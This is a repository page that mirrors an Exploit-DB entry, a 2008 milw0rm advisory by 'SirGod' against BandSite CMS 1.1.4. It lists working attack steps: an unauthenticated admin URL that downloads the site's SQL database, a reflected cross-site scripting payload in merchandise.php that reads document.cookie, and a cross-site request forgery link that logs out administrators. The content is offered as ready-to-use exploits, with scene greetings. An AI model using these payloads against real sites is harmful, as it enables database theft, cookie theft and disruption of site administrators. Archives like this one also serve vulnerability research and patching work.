bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/6286.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

32 lines
No EOL
1,013 B
Text
Raw Blame History

###########################################################################
[+] BandSite CMS 1.1.4 Arbitrary Download Database/XSS/CSRF
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN
###########################################################################
[+] Arbitrary Download Database
Go to
http://localhost/[Path]/adminpanel/phpmydump.php
and the download will begin ( database.sql ) .
[+] Cross Site Scripting
http://localhost/[Path]/merchandise.php?type=[XSS]
http://localhost/[Path]/merchandise.php?type=<script>alert(document.cookie)</script>
[+] Cross Site Request Forgery
If a logged in user with administrator privilegies click the following url he will be logged out.
http://localhost/[Path]/adminpanel/logout.php
###########################################################################
# milw0rm.com [2008-08-21]
Reference in a new issue View git blame Copy permalink